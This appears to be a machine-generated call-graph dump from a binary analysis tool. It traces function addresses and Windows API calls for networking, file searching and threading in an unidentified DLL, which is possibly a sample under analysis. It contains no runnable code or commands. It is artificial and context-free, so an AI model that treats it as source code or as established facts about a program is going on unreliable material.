37708 1001b06a 37707->37708 37708->37701 37710 1001b041 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37709->37710 37710->37706 37712 10054b24 37711->37712 37717 10054b2b 37711->37717 37713 10025980 2 API calls 37712->37713 37714 10054d54 37713->37714 37714->37670 37715 10054d0a 37716 10054d1d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37715->37716 37716->37712 37717->37712 37717->37715 37718 10059880 166 API calls 37717->37718 37719 10054baf 37718->37719 37720 10054ce6 37719->37720 37723 10054cb3 37719->37723 37726 10054c18 37719->37726 37747 10059330 RtlEnterCriticalSection 37720->37747 37722 10054cf8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37722->37715 37724 10009f50 Mailbox 2 API calls 37723->37724 37725 10054cc4 37724->37725 37771 10054390 ??3@YAXPAX 37725->37771 37764 100592c0 RtlEnterCriticalSection RtlLeaveCriticalSection 37726->37764 37729 10054c3f 37765 10009f50 37729->37765 37731 10054c50 37770 10054390 ??3@YAXPAX 37731->37770 37733 10054c72 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37734 1005b720 37733->37734 37735 10054c97 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37734->37735 37735->37712 37737 10053ecc 37736->37737 37738 10053ebb 37736->37738 37740 10053ed4 closesocket 37737->37740 37741 10053ee2 37737->37741 37738->37737 37739 10053ec2 WSAEventSelect 37738->37739 37739->37737 37740->37741 37742 10053ef8 37741->37742 37743 10053eea WSACloseEvent 37741->37743 37744 10053f0d 37742->37744 37745 10053eff CancelWaitableTimer 37742->37745 37743->37742 37744->37670 37745->37744 37746->37670 37750 1005937b 37747->37750 37748 10059550 RtlLeaveCriticalSection 37748->37722 37749 100593d7 GetTickCount 37752 1005947e 37749->37752 37756 100593f0 37749->37756 37750->37748 37750->37749 37751 100594e4 37755 100594fc ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 37751->37755 37758 1005946b 37751->37758 37752->37748 37752->37751 37753 100594d1 37752->37753 37772 10058a30 RtlEnterCriticalSection 37753->37772 37755->37758 37756->37748 37756->37752 37782 1005c1f0 RtlEnterCriticalSection RtlLeaveCriticalSection 37756->37782 37758->37748 37759 10059438 37760 10059470 37759->37760 37762 10059445 37759->37762 37761 10009f50 Mailbox 2 API calls 37760->37761 37761->37752 37763 10009f50 Mailbox 2 API calls 37762->37763 37763->37758 37764->37729 37766 10009f5b 37765->37766 37767 10009f7f 37765->37767 37768 10009f72 ??3@YAXPAX 37766->37768 37769 10009f63 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37766->37769 37767->37731 37768->37767 37769->37768 37769->37769 37770->37733 37771->37720 37780 10058a79 37772->37780 37773 10058ae0 37774 10058b1a GetTickCount RtlLeaveCriticalSection 37773->37774 37775 100258ac 3 API calls 37773->37775 37774->37758 37776 10058aef 37775->37776 37778 10058aff 37776->37778 37794 1005c260 CreateThread 37778->37794 37780->37773 37781 10058adc 37780->37781 37783 10053b90 37780->37783 37781->37773 37782->37759 37784 10053bef inet_addr 37783->37784 37786 10053c09 37784->37786 37793 10053ca3 37784->37793 37787 10053c11 htons 37786->37787 37786->37793 37789 10053c40 37787->37789 37788 10025980 2 API calls 37790 10053cf2 37788->37790 37791 10053c64 sendto 37789->37791 37790->37780 37792 10053c8d WSAGetLastError 37791->37792 37791->37793 37792->37793 37793->37788 37794->37774 37795 1005c250 37794->37795 37798 1005be60 GetCurrentThreadId 37795->37798 37799 1005beac gethostbyname 37798->37799 37810 100258ac 3 API calls 37809->37810 37811 100155b7 37810->37811 37812 1005c680 37811->37812 37827 1005cba0 37812->37827 37815 1005c814 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37817 10025980 2 API calls 37815->37817 37816 1005c6e6 fopen 37816->37815 37820 1005c70e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37816->37820 37819 1005c848 37817->37819 37819->37629 37821 1005c7f8 fclose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37820->37821 37822 1005c72c 37820->37822 37821->37815 37822->37821 37822->37822 37823 1005c7cf ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 37822->37823 37824 1005c758 fread 37822->37824 37825 1005c7a3 getc 37822->37825 37851 1005c380 28 API calls Mailbox 37823->37851 37824->37822 37825->37822 37828 1005c9b0 37827->37828 37829 1005cbe7 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 37828->37829 37830 1005cc34 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37829->37830 37831 1005cc0a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37829->37831 37832 10010810 37830->37832 37841 1005cd7c 37831->37841 37833 1005cc6f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37832->37833 37835 10010810 37833->37835 37834 10025980 2 API calls 37836 1005c6c0 ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 37834->37836 37837 1005cca5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37835->37837 37836->37815 37836->37816 37838 1005cd21 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37837->37838 37842 1005ccc4 37837->37842 37840 1005cd68 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37838->37840 37843 1005cd46 37838->37843 37840->37841 37841->37834 37845 1005ccee FindFirstFileA 37842->37845 37852 100013d0 37842->37852 37844 1005cd5f ??3@YAXPAX 37843->37844 37846 1005cd50 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37843->37846 37844->37840 37847 1005cda3 FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37845->37847 37848 1005cd03 GetLastError ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37845->37848 37846->37844 37846->37846 37849 10009f50 Mailbox 2 API calls 37847->37849 37848->37838 37848->37842 37850 1005cde5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37849->37850 37850->37841 37851->37822 37855 10025930 37852->37855 37854 100013da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37854->37842 37855->37854 37857 10053f35 WSACreateEvent 37856->37857 37859 10053f54 CreateWaitableTimerA SetWaitableTimer 37856->37859 37858 10053f42 WSAEventSelect 37857->37858 37857->37859 37858->37859 37859->37421 37860 100b0c80 37861 100b0cb8 37860->37861 37862 100b0d51 37861->37862 37863 100258ac 3 API calls 37861->37863 37864 100b0cf4 37863->37864 37865 10026a90 37866 10026ace CreateFileA 37865->37866 37868 10026b25 GetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 37866->37868 37869 10026b7f 37866->37869 37870 1002bc50 37868->37870 37871 10025980 2 API calls 37869->37871 37872 10026b70 _CxxThrowException 37870->37872 37873 10026b9a 37871->37873 37872->37869 37874 1003ad10 37876 1003ad46 37874->37876 37875 1003ae48 37895 10039640 ??0?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H 37875->37895 37876->37875 37877 1003ae3c rand 37876->37877 37877->37875 37879 1003aea2 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 37880 1003aec3 37879->37880 37881 1003aee1 37879->37881 37882 1003aed0 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 37880->37882 37883 1003aeff WSAEventSelect 37881->37883 37886 1003aef0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37881->37886 37882->37881 37882->37882 37887 1003af20 WSAGetLastError 37883->37887 37888 1003af28 htons 37883->37888 37884 10039640 20 API calls 37885 1003ae60 37884->37885 37885->37879 37885->37884 37886->37883 37886->37886 37889 1003af75 37887->37889 37890 1003af47 inet_addr GetTickCount connect 37888->37890 37893 10025980 2 API calls 37889->37893 37890->37889 37892 1003af78 WSAGetLastError 37890->37892 37892->37889 37894 1003af9e 37893->37894 37905 100019a2 37895->37905 37898 100396cf 37899 100396ed ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37898->37899 37900 1003970a ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2 37899->37900 37904 10039742 ??_D?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 37899->37904 37919 100392b0 ??$?MDU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37900->37919 37903 10039729 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 37903->37904 37904->37885 37906 100019ac __EH_prolog 37905->37906 37920 100016f3 37906->37920 37908 10001a3b 37912 10001a75 37908->37912 37916 10001a5c ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 37908->37916 37918 100019f3 37908->37918 37909 100019ea 37909->37908 37910 10001a1b ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 37909->37910 37909->37918 37910->37908 37910->37909 37911 10001b11 37926 10001750 37911->37926 37915 10001a85 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD 37912->37915 37912->37918 37913 10001b09 ?clear@ios_base@std@@QAEXH_N 37913->37911 37915->37912 37915->37918 37916->37908 37916->37912 37918->37911 37918->37913 37919->37903 37921 100016fd __EH_prolog 37920->37921 37933 100012b1 37921->37933 37924 1000172e 37924->37909 37925 10001726 ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QAEAAV12 37925->37924 37936 10025930 37926->37936 37928 1000175a ?uncaught_exception@std@ 37929 10001777 37928->37929 37930 1000176f ?osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 37928->37930 37937 1000130a 37929->37937 37930->37929 37934 100012d0 37933->37934 37935 100012c7 ?_Lock@_Mutex@std@ 37933->37935 37934->37924 37934->37925 37935->37934 37936->37928 37938 10001322 ??$?6U?$char_traits@D@std@@@std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@D ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@G ?str@?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2 37937->37938 37939 10001319 ?_Unlock@_Mutex@std@ 37937->37939 37938->37898 37939->37938 37940 10048810 37941 10048844 37940->37941 37942 10048929 WSARecv 37941->37942 37943 10048934 WSAGetLastError 37942->37943 37945 10048944 37942->37945 37944 10048961 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37943->37944 37943->37945 37946 1021adf0 37944->37946 37947 10048989 _CxxThrowException 37946->37947 37947->37945 37948 1004ff10 37949 1004ff18 37948->37949 37950 1004ff1f ??3@YAXPAX 37949->37950 37951 1004ff28 37949->37951 37950->37951 37952 10041310 37958 10035c80 37952->37958 37954 10041320 37955 10041324 37954->37955 37961 10041220 37954->37961 37957 1004134a 37959 10035c9a 37958->37959 37960 10035c8a GetCurrentThreadId 37958->37960 37959->37954 37960->37954 37970 10051320 37961->37970 37965 10041288 setsockopt 37966 100412a0 37965->37966 37967 100412b8 37965->37967 37966->37957 37981 10051470 37967->37981 37971 10041252 WSAIoctl 37970->37971 37972 10051348 socket 37970->37972 37971->37965 37973 1005139c WSAIoctl setsockopt 37972->37973 37974 1005135c WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37972->37974 37973->37971 37978 100513f8 WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37973->37978 37975 1021adf0 37974->37975 37976 1005138d _CxxThrowException 37975->37976 37976->37973 37979 1021adf0 37978->37979 37980 10051429 _CxxThrowException 37979->37980 37980->37971 37982 10051320 9 API calls 37981->37982 37983 1005149b htons bind 37982->37983 37984 100514d4 WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 37983->37984 37985 10051511 37983->37985 37986 1021adf0 37984->37986 37987 10025980 2 API calls 37985->37987 37988 10051502 _CxxThrowException 37986->37988 37989 100412c7 37987->37989 37988->37985 37989->37957 37990 10005417 37991 10005434 GetTickCount 37990->37991 37992 1000542c set_hub_proxy 37990->37992 37993 10005444 37991->37993 37992->37991 37996 1001d704 37993->37996 37997 1001d70e __EH_prolog 37996->37997 37998 1001d74d InterlockedIncrement 37997->37998 37999 1001d7ce CoInitializeEx CoCreateInstance 37998->37999 38002 1001d764 37998->38002 38006 1001d808 37999->38006 38000 1001d7ac InterlockedDecrement 38001 1001d7bd RtlLeaveCriticalSection 38000->38001 38041 1001d7c7 38000->38041 38001->38041 38002->38000 38077 1001c10b ??3@YAXPAX 38002->38077 38003 10025980 2 API calls 38005 10005456 38003->38005 38044 10018110 38006->38044 38008 1001d797 38008->38000 38013 1001d875 38014 1001d8f9 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI 38013->38014 38017 1001d9cb 38013->38017 38015 10013070 38014->38015 38016 1001d924 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38015->38016 38016->38017 38022 1001d951 38016->38022 38018 1001da73 GetTickCount 38017->38018 38019 1001d9e3 38017->38019 38056 10031aa0 38018->38056 38021 10009f50 Mailbox 2 API calls 38019->38021 38020 1001d95c ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38020->38022 38031 1001d9f2 38021->38031 38022->38017 38022->38020 38024 1001db23 GetModuleHandleW ??0?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@H GetModuleFileNameW 38027 1001db8b 38024->38027 38032 1001dc19 38024->38032 38025 1001da96 38026 10009f50 Mailbox 2 API calls 38025->38026 38033 1001daa5 38026->38033 38029 1001dbb3 8 API calls 38027->38029 38028 1001dd19 ??_D?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38030 10009f50 Mailbox 2 API calls 38028->38030 38029->38032 38035 1001dd38 38030->38035 38034 1001da5f RtlLeaveCriticalSection 38031->38034 38031->38041 38032->38028 38036 1001dc7f ?str@?$basic_ostringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@2 38032->38036 38037 1001db12 RtlLeaveCriticalSection 38033->38037 38033->38041 38034->38041 38038 1001ddb3 WaitForSingleObject 38035->38038 38039 1001dda9 RtlLeaveCriticalSection 38035->38039 38040 1001dca2 38036->38040 38037->38041 38038->38041 38039->38038 38042 1001dd09 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38040->38042 38041->38003 38042->38028 38046 1001811a __EH_prolog 38044->38046 38045 10018178 38048 1001819b 38045->38048 38046->38045 38047 1001816e RtlLeaveCriticalSection 38046->38047 38047->38045 38050 100181a5 __EH_prolog 38048->38050 38049 10018203 38052 10018226 38049->38052 38050->38049 38051 100181f9 RtlLeaveCriticalSection 38050->38051 38051->38049 38054 10018230 __EH_prolog 38052->38054 38053 1001828e 38053->38013 38054->38053 38055 10018284 RtlLeaveCriticalSection 38054->38055 38055->38053 38057 10031afe WSAStartup 38056->38057 38076 10031af4 38056->38076 38058 10031b20 38057->38058 38057->38076 38078 100483b0 _callnewh ?_Nomemory@std@ malloc AtlComPtrAssign 38058->38078 38059 10025980 2 API calls 38061 1001da8c 38059->38061 38061->38024 38061->38025 38062 10031b26 38063 100258ac 3 API calls 38062->38063 38064 10031b3b 38063->38064 38065 100258ac 3 API calls 38064->38065 38066 10031b72 38065->38066 38067 100258ac 3 API calls 38066->38067 38069 10031bb1 38067->38069 38068 100258ac 3 API calls 38070 10031bf3 38068->38070 38069->38068 38076->38059 38077->38008 38078->38062 38080 1007a810 38081 1007a834 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0exception@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ _CxxThrowException 38080->38081 38082 1007a88d 38080->38082 38081->38082 38083 10089990 __RTDynamicCast 38084 100899cd 38083->38084 38086 100899f1 Mailbox 38083->38086 38087 10075b3e 38084->38087 38088 10075b48 __EH_prolog 38087->38088 38089 100258ac 3 API calls 38088->38089 38090 10075b5a 38088->38090 38089->38090 38090->38086 38091 100b5f90 38092 100b5fd2 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38091->38092 38115 100b62d8 38091->38115 38101 100b5ff2 38092->38101 38093 10025980 2 API calls 38094 100b6995 38093->38094 38095 100b60d7 ResetEvent 38096 100b60ef 38095->38096 38097 100b60fa GetTickCount 38096->38097 38098 100b6116 38097->38098 38099 100b6379 38098->38099 38100 100b6137 38098->38100 38155 10089d40 RtlEnterCriticalSection RtlLeaveCriticalSection 38099->38155 38102 100b617b 38100->38102 38105 100b6225 38100->38105 38101->38095 38178 1006eae0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38102->38178 38106 1006eae0 16 API calls 38105->38106 38105->38115 38109 100b6257 38106->38109 38107 100b61a1 38108 100b61e8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38107->38108 38108->38115 38110 100b629e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38109->38110 38110->38115 38111 100b63a3 38112 100b644a 38111->38112 38113 100b648c 38111->38113 38185 100b4350 91 API calls 38112->38185 38116 100b64c7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38113->38116 38115->38093 38117 100b651e 38116->38117 38118 100b6534 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38117->38118 38119 100b6564 38118->38119 38121 100b65bd 38118->38121 38120 100b6569 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38119->38120 38119->38121 38120->38121 38122 100b65f2 38121->38122 38123 100b65e1 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38121->38123 38124 100b6602 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38122->38124 38125 100b660f 38122->38125 38123->38122 38124->38125 38154 100b68da 38125->38154 38186 10089d40 RtlEnterCriticalSection RtlLeaveCriticalSection 38125->38186 38127 100b6642 38128 100b671f 38127->38128 38129 100b6671 38127->38129 38130 100258ac 3 API calls 38128->38130 38131 100258ac 3 API calls 38129->38131 38133 100b6724 38130->38133 38138 100b6676 38131->38138 38134 100b673b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38133->38134 38135 100b67e7 38133->38135 38136 100b6763 38134->38136 38139 100b66f8 38135->38139 38140 100b6801 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38135->38140 38143 100298f0 16 API calls 38136->38143 38137 100b682c 38142 100b68b2 38137->38142 38145 100b688a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38137->38145 38146 100b6843 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38137->38146 38138->38139 38187 100298f0 38138->38187 38139->38137 38141 100b6826 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38139->38141 38140->38139 38141->38137 38203 100c1580 55 API calls 38142->38203 38147 100b677e 38143->38147 38149 100b6869 38145->38149 38146->38149 38202 100c12a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38147->38202 38153 100b6876 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38149->38153 38153->38142 38154->38115 38156 100b0650 38154->38156 38155->38111 38157 100258ac 3 API calls 38156->38157 38158 100b0689 38157->38158 38159 100b06a4 38158->38159 38219 100e986d 12 API calls __EH_prolog 38158->38219 38161 100b06be ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38159->38161 38204 1006d7fe 38161->38204 38164 1008a210 38165 100b07d8 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38164->38165 38211 10071e70 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38165->38211 38179 1006d7fe 5 API calls 38178->38179 38180 1006eb89 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38179->38180 38181 100013d0 4 API calls 38180->38181 38182 1006ebcb ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38181->38182 38183 10025980 2 API calls 38182->38183 38184 1006ec05 38183->38184 38184->38107 38185->38115 38186->38127 38188 10029940 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38187->38188 38189 1002992e ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38187->38189 38192 10029969 38188->38192 38190 10029a60 38189->38190 38191 10025980 2 API calls 38190->38191 38193 10029a7a 38191->38193 38194 100299b7 38192->38194 38195 10029979 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBD 38192->38195 38201 100c1190 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38193->38201 38198 100299c5 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?find_last_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII 38194->38198 38196 1000f130 38195->38196 38197 10029996 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38196->38197 38197->38194 38199 10029a0a ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@II ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38198->38199 38200 10029a3f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38198->38200 38199->38200 38200->38190 38201->38139 38202->38135 38203->38154 38220 10025930 38204->38220 38206 1006d808 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38208 1006d84c 38206->38208 38207 1006d89d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38209 10025980 2 API calls 38207->38209 38208->38207 38210 1006d8d2 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38209->38210 38210->38164 38219->38159 38220->38206 38228 1002029e 38229 100202a8 __EH_prolog 38228->38229 38230 100258ac 3 API calls 38229->38230 38232 100202ba 38229->38232 38231 100202da 38230->38231 38231->38232 38234 10002e96 38231->38234 38237 1001c17d 38234->38237 38238 1001c187 __EH_prolog 38237->38238 38273 10001263 38238->38273 38242 1001c1bc 38284 10001000 RtlInitializeCriticalSection 38242->38284 38244 1001c248 38285 10001000 RtlInitializeCriticalSection 38244->38285 38246 1001c253 38247 1001c271 CreateEventA GetTickCount ?erase@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@II 38246->38247 38248 1001c2d7 Mailbox 38247->38248 38286 10001429 38248->38286 38250 1001c2fc _putenv GetLastError 38289 100122e9 38250->38289 38334 100011ff memset 38273->38334 38275 1000126b 38335 10001213 38275->38335 38277 10001272 38278 1000127c 38277->38278 38339 100011e7 _CxxThrowException 38277->38339 38280 10019a36 38278->38280 38281 10019a40 __EH_prolog 38280->38281 38341 10001000 RtlInitializeCriticalSection 38281->38341 38283 10019a78 38283->38242 38284->38244 38285->38246 38342 10025930 38286->38342 38288 10001433 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38288->38250 38334->38275 38340 100259a0 38335->38340 38337 1000121f RtlInitializeCriticalSection 38338 10001257 38337->38338 38338->38277 